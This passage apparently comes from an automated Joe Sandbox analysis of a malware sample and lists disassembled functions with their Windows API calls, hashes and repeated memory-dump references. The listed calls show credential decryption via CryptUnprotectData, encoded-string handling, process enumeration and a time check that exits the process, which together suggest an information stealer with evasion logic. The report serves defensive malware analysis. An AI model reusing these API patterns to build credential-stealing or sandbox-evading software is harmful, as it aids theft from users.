                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: "l[$+A>$C^$fm;$5-
                                      • API String ID: 0-3770104002
                                      • Opcode ID: 8311bd265200c62ff4ea749d387122e86c6594308b34ecc5033347d5e3382a4c
                                      • Instruction ID: 210424149b1bcf3ba44d1101a1a6e382b98fbf7f83ea49e3e877f97a3a42d6ae
                                      • Opcode Fuzzy Hash: 8311bd265200c62ff4ea749d387122e86c6594308b34ecc5033347d5e3382a4c
                                      • Instruction Fuzzy Hash: FEB248F3A082049FD304AE2DEC8567AFBE9EFC4320F16463DEAC4C3744EA3558458696
                                      Function 00A9F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: \u$\u${${$}$}
                                      • API String ID: 0-582841131
                                      • Opcode ID: ecadac53184a339f67e2b570eb8e36acd4bc728bc99a68cfb7534c6de069692a
                                      • Instruction ID: f6dba45e0574e7174fc64b67cc8eab1ab26a87b767a3eb099fe17ba2182bb2c8
                                      • Opcode Fuzzy Hash: ecadac53184a339f67e2b570eb8e36acd4bc728bc99a68cfb7534c6de069692a
                                      • Instruction Fuzzy Hash: FC41A022E19BD9C5CB018B7444A02AEBFB22FD6210F6D82EAC4DD5F782C774454AD3A5
                                      Function 00A3C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A3C971
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A3C97C
                                      • lstrcat.KERNEL32(?,00A50B47), ref: 00A3CA43
                                      • lstrcat.KERNEL32(?,00A50B4B), ref: 00A3CA57
                                      • lstrcat.KERNEL32(?,00A50B4E), ref: 00A3CA78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlen
                                      • String ID:
                                      • API String ID: 189259977-0
                                      • Opcode ID: 48557de6ca68bac358865db4c77e0ecdaab44d87cf1faac4ace84ca4cca1ac60
                                      • Instruction ID: 104d2480446047a14b4097560befc1c15a7f7d69e3bf390077b6730a35d1aab4
                                      • Opcode Fuzzy Hash: 48557de6ca68bac358865db4c77e0ecdaab44d87cf1faac4ace84ca4cca1ac60
                                      • Instruction Fuzzy Hash: E1415F75D0431E9BDB10CFA4DD89BEEB7B9BB48344F1046A8F509A7280D7706A84CFA1
                                      Function 00A46BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 00A46C0C
                                      • sscanf.NTDLL ref: 00A46C39
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A46C52
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A46C60
                                      • ExitProcess.KERNEL32 ref: 00A46C7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: 4ffc98d9d5bf141349fc6755fcd5ad7dfd9406304f93cc3b5cf64930b0d3c5ef
                                      • Instruction ID: e4c7b9e124f7d0182797a4ccf71d6a0aa1e6bda1b06645b63aaa8cc643bc24b3
                                      • Opcode Fuzzy Hash: 4ffc98d9d5bf141349fc6755fcd5ad7dfd9406304f93cc3b5cf64930b0d3c5ef
                                      • Instruction Fuzzy Hash: 6621CD75D14209ABCF44DFE4E945AEEB7B5FF48300F048529F50AE7250EB34A604CB69
                                      Function 00A372A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00A372AD
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A372B4
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A372E1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00A37304
                                      • LocalFree.KERNEL32(?), ref: 00A3730E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: 1c696a3e6daee284ff1daae78ca4f4b63ac767c9eaba58689e1dd263cbf5c7d3
                                      • Instruction ID: 59e7be704608b666e202df26d4f41cf30b652a0f854fa8ad441cecf9c392dd38
                                      • Opcode Fuzzy Hash: 1c696a3e6daee284ff1daae78ca4f4b63ac767c9eaba58689e1dd263cbf5c7d3
                                      • Instruction Fuzzy Hash: 3901EDB5A44308BBDB10DFA4DC45F9D7778AB44B00F104544FB09EE2C0D6B0BA009B65
                                      Function 00A49790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A497AE
                                      • Process32First.KERNEL32(00A50ACE,00000128), ref: 00A497C2
                                      • Process32Next.KERNEL32(00A50ACE,00000128), ref: 00A497D7
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 00A497EC
                                      • CloseHandle.KERNEL32(00A50ACE), ref: 00A4980A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: e20291b833d9f8ea487c95d0126dccca375792b774e584860740e1f87a47922e
                                      • Instruction ID: a4f465d9b6cedbac84ae0b4a22bd8239e598a92dca3dbb29f0a98f65056afa77
                                      • Opcode Fuzzy Hash: e20291b833d9f8ea487c95d0126dccca375792b774e584860740e1f87a47922e
                                      • Instruction Fuzzy Hash: E6010C79E14308EBDB20DFA4CD44BDEBBB8BB48700F104588E509EB240D770AA50CFA0
                                      Function 00A54573 Relevance: 7.3, Strings: 2, Instructions: 4815COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: <7\h$huzx
                                      • API String ID: 0-2989614873
                                      • Opcode ID: c01c99c175d3aef062684bc9eea81fc79dc27f050d7f98a896e1e4247f55a70e
                                      • Instruction ID: 0c0614099484639ec9a124e95c5cd12e4e2786918c07bcc175f30e2a0013becf
                                      • Opcode Fuzzy Hash: c01c99c175d3aef062684bc9eea81fc79dc27f050d7f98a896e1e4247f55a70e
                                      • Instruction Fuzzy Hash: DA63447281EBD41EC727CB3087B61917F66BA1361231D49CEC8C18F5B3C6A49A1EE356
                                      Function 00E99D69 Relevance: 6.7, Strings: 4, Instructions: 1667COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: iw_$<m7D$2m$s|g
                                      • API String ID: 0-843695166
                                      • Opcode ID: 8c18c1f306cd1a7a63ef3bda420e060437bac9e41abeeb079cc681fe0b1d7ee8
                                      • Instruction ID: 91acf782e74a13cc1a491c349ecce2d226036e2a62ea79f99c0b5b09d6c7c044
                                      • Opcode Fuzzy Hash: 8c18c1f306cd1a7a63ef3bda420e060437bac9e41abeeb079cc681fe0b1d7ee8
                                      • Instruction Fuzzy Hash: 3CB207F360C214AFE3046E2DEC8567ABBE9EF94720F16493DE6C4C7744EA3598018796
                                      Function 00A49030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00A351D4,40000001,00000000,00000000,?,00A351D4), ref: 00A49050
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 33abae1c7b3e6e6b8482c0cb0461b0f322854bba99d20b0ad231ed580f2b941c
                                      • Instruction ID: 8d35f53dac9a56347c7e42327fa89335832169a266107d047302da3569d8baeb
                                      • Opcode Fuzzy Hash: 33abae1c7b3e6e6b8482c0cb0461b0f322854bba99d20b0ad231ed580f2b941c
                                      • Instruction Fuzzy Hash: 4211F278204208EFDB00CFA4D884BAB33B9AFC9351F108548FA298B350D776E9518BA4
                                      Function 00A3A210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A34F3E,00000000,00000000), ref: 00A3A23F
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00A34F3E,00000000,?), ref: 00A3A251
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A34F3E,00000000,00000000), ref: 00A3A27A
                                      • LocalFree.KERNEL32(?,?,?,?,00A34F3E,00000000,?), ref: 00A3A28F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      • Opcode ID: 9da086c4bccf1b9bd6d9e7e5467dacf2cb1fafdd8081624909f89d8e1f7d2210
                                      • Instruction ID: b4d8553ba231e465c83e394fa46c7a404fd987f1643044249ff5fb104279eefa
                                      • Opcode Fuzzy Hash: 9da086c4bccf1b9bd6d9e7e5467dacf2cb1fafdd8081624909f89d8e1f7d2210
                                      • Instruction Fuzzy Hash: 7011A474640308AFEB11CFA4CC95FAA77B5EB89B10F208458FD199F390C772A941CB64
                                      Function 00A47BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0131E880,00000000,?,00A50DF8,00000000,?,00000000,00000000), ref: 00A47BF3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A47BFA
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0131E880,00000000,?,00A50DF8,00000000,?,00000000,00000000,?), ref: 00A47C0D
                                      • wsprintfA.USER32 ref: 00A47C47
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
